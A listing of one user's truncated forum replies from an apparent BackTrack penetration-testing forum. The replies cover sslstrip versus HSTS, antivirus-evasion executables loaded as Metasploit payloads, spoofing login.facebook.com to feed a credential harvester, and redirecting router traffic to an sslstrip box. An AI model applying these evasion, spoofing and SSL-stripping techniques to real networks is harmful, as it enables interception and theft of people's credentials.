Type: Posts; User: thaijames; Keyword(s):

  1. Replies
    4
    Views
    7,394

    Re: HSTS and its effect on sslstrip

    I did some further reading. The header can only be set in a secure connection, which means that you could not use sslstrip or ettercap to intercept and remove the headers. Which makes sense.
    ...
  2. Replies
    4
    Views
    7,394

    Re: HSTS and its effect on sslstrip

    Thanks for the information.

    sslstrip can already change or remove headers. Look into the python code and you will see that you can strip the headers before they get to the victim.

    I could not...
  3. Replies
    113
    Views
    52,903

    Re: [script] for AV evasion

    That is what I thought, thanks for confirming it.
  4. Replies
    113
    Views
    52,903

    Re: [script] for AV evasion

    Thank you for your help

    I try the following:
    use exploit/windows/browser/msxml_get_definition_code_exec
    set EXE::Custom /root/test.exe
    set URIPATH test
    exploit -j

    When I access the generated...
  5. Replies
    113
    Views
    52,903

    Re: [script] for AV evasion

    Thank you for your work on this script. Works great as a standalone executable. This may sound ignorant, do you know any way to use the exe as a payload in metasploit?
  6. Replies
    5
    Views
    4,222

    Re: Combining Credential Harvester with DNS Spoofing

    I would only spoof part of the domain for example:
    192.168.0.111 (your ip) login.facebook.com

    since login.facebook.com does not exist, there is no problem when the victim is redirected to the...
  7. Replies
    1
    Views
    2,066

    Re: Questions about evading AV software with Python

    From what I understand, virus software has basically white listed anything that is python. I think that because just like java, they can't tell one python from the other to determine if it is...
  8. Replies
    1
    Views
    2,596

    Re: Bash Script for Scapy

    Scapy is python,

    so you should run it as a python script for example:

    #! /usr/bin/env python
    from scapy.all import *

    def arp_monitor_callback(pkt):
    if ARP in pkt and pkt[ARP].op in...
  9. Replies
    3
    Views
    6,132

    Re: HTTP injection options in MITM attack

    Both Charles Proxy and Burp have a headless mode (run without interface)

    If you come up with any good scripts to control any of these transparent proxies, would appreciate if you could share.
  10. Replies
    3
    Views
    6,132

    Re: HTTP injection options in MITM attack

    Charles Proxy is an excellent tool for this kind of thing, much better than burp. Using bash to read data from the web interface you can automate everything.
    You may also want to try Sergio Proxy...
  11. Re: Virtual Machine Bridged IP - Mac OSX Wireless - BT5

    Oh in case you were referring to the built in wireless card not USB, I have no problems with that either.
  12. Re: Virtual Machine Bridged IP - Mac OSX Wireless - BT5

    Hmm, I am not sure If I am answering your question properly but here is a more detailed answer:

    I am using a Mac Air running osx LION with latest version of VMware Fusion. I have 4-5 wireless...
  13. Re: Virtual Machine Bridged IP - Mac OSX Wireless - BT5

    No problems on osx Lion both BT5 and Ubuntu
  14. Thread: xplico

    by thaijames
    Replies
    3
    Views
    5,722

    Re: xplico

    Download the source code and then run make install
    Xplico has a step by step wiki on their web site. The .deb does not seem to work even on other versions of ubuntu

    excellent program, I don't...
  15. Replies
    10
    Views
    10,106

    Re: Wicd not showing any wireless connection

    WICD is the most frustrating piece of software on backtrack and one of the reasons people want to try and use a different distribution. Hopefully with the new version of backtrack coming out based...
  16. Re: Re: sslstrip -> proxychains -> squid --> odd behavior (at least for me)

    Remotely as SSH into a remote network and then use proxychains to sslstrip the remote network.
  17. Re: sslstrip -> proxychains -> squid --> odd behavior (at least for me)

    Very interesting use of Proxychains and SSLSTRIP, have you been successful without the SQUID Proxy?

    Also wouldn't the IP tables need to be run on the remote server?

    Be interesting if you can...
  18. Thread: truecrypt backtrack

    by thaijames
    Replies
    3
    Views
    2,735

    Re: truecrypt backtrack

    No problem to have a hidden truecrypt partition, usually this is a partition inside another truecrypt partition.

    Unlike windows you can't boot from a Linux truecrypt partition.
  19. Replies
    5
    Views
    6,021

    Re: Mac Address Scanner...

    Almost all scanners (nmap, ettercap) provide mac address information. Have you never used a scanner before?
  20. Thread: Owned an Exposed

    by thaijames
    Replies
    8
    Views
    3,886

    Re: Owned an Exposed

    I think it is legitimate to ask these questions.

    The real question is how will we ever know the answer?

    And should pentesters be worried that they may be injecting backdoors on their customers...
  21. Thread: Google Earth 6

    by thaijames
    Replies
    8
    Views
    3,252

    Re: Google Earth 6

    run the following in terminal:
    ln -s /lib/ld-linux.so.2 /lib/ld-lsb.so.3
  22. Replies
    5
    Views
    4,414

    Re: BackTrack 4 R2 - Ferret Not Installed

    It is installed, the menus have changed a bit.
  23. Replies
    19
    Views
    26,668

    Sticky: Re: Upgrading BackTrack 4 Final (or R1) to BackTrack R2

    I get the same error on two different computers that previously have R1 installed:

    Errors were encountered while processing:
    ...
  24. Replies
    10
    Views
    30,862

    Re: Metasploit autopwn basics

    I have noticed that autopwn works fine using fastrack but does not work correctly when typing the same commands from the console (using sqlite3)
    anybody have any idea why?
  25. Replies
    16
    Views
    10,911

    Re: dd-wrt redirecting traffic to a sslstrip box

    I will try to do a proper tutorial when I have more time. In the meantime
    Here is what I do:

    #go to the tmp dir
    cd /tmp

    #Download the file
    wget...
Results 1 to 25 of 40